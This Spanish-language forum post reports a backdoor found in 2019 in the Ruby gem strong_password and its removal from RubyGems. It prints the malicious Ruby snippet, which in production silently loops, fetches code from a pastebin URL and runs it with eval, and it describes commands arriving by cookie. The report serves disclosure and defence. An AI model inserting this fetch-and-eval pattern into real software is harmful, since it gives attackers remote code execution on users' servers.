Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Backdoor descubierto en una librería de Ruby

  • 0 Respuestas
  • 497 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado K A I L

  • *
  • Moderador
  • Mensajes: 143
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 15, 2019, 09:11:00 am »

El desarrollador Tute Costa ha descubierto un backdoor alojado en una popular librería (Gem) de Ruby llamada strong_password, utilizada para comprobar la robustez de las contraseñas elegidas por los usuarios.

El código malicioso comprueba si la biblioteca se está utilizando en un entorno de producción, en caso afirmativo descarga y ejecuta un payload desde la plataforma pastebin.com, un conocido repositorio de texto online. Al ejecutarse el payload se crea la puerta trasera en la app o página web dando acceso a la ejecución de código remoto al atacante.

Código: [Seleccionar]
def _!;
  begin;
    yield;
  rescue Exception;
  end;
end

_!{
  Thread.new {
    loop {
      _!{
        sleep rand * 3333;
        eval(
          Net::HTTP.get(
            URI('https://pastebin.com/raw/xa456PFt')
          )
        )
      }
    }
  } if Rails.env[0] == "p"

El backdoor envía la URL de cada sitio infectado a «smiley.zzz.com.ua», quedándose a la espera de nuevas instrucciones, que serán recibidas en forma de cookies, desempaquetadas y ejecutadas a través de la función eval. Esto da acceso al atacante a ejecutar código, con el que sencillamente puede conseguir una terminal en el servidor infectado.

En el momento de reportar el problema al propietario de la biblioteca, descubrió que el atacante presuntamente reemplazó al desarrollador real de la librería en RubyGems, repositorio oficial del lenguaje Ruby. Creó una nueva versión (0.0.7) de la ya existente librería con el backdoor en su interior. Según las estadísticas de RubyGems la librería 537 usuarios descargaron esta versión maliciosa. Además el código fuente de esta nueva versión no fue subido a Github, tan solo fue distribuido a través de RubyGems.

Costas reportó tanto al propietario como al equipo de seguridad de RubyGems y la versión maliciosa fue eliminada del repositorio.

Cualquier proyecto que utilice la citada librería strong_password debería ser revisado exhaustivamente para detectar posibles robos de datos de usuarios u otro tipo de acciones llevadas a cabo por el atacante.

Fuente:
https://unaaldia.hispasec.com/2019/07/backdoor-descubierto-en-una-libreria-de-ruby.html
« Última modificación: Julio 15, 2019, 06:08:50 pm por Denisse »

 

¿Te gustó el post? COMPARTILO!



Facebook Hackeado! Alguien puso un Backdoor Script en un servidor de Facebook.

Iniciado por HATI

Respuestas: 1
Vistas: 1904
Último mensaje Junio 04, 2016, 08:19:28 pm
por Lovecraft
Google detecto un Backdoor preinstalado en dispositivos Android

Iniciado por Dragora

Respuestas: 0
Vistas: 941
Último mensaje Junio 07, 2019, 07:15:43 pm
por Dragora
Backdoor en WhatsApp permite interceptar comunicaciones cifradas

Iniciado por HATI

Respuestas: 0
Vistas: 1944
Último mensaje Enero 13, 2017, 03:12:09 pm
por HATI
Detectado backdoor en el módulo Python SSH Decorate / Decorator

Iniciado por K A I L

Respuestas: 0
Vistas: 1254
Último mensaje Mayo 10, 2018, 07:23:11 am
por K A I L
EvilGnome: un nuevo Backdoor en usuarios de escritorio de Linux

Iniciado por Dragora

Respuestas: 0
Vistas: 583
Último mensaje Julio 17, 2019, 02:58:12 pm
por Dragora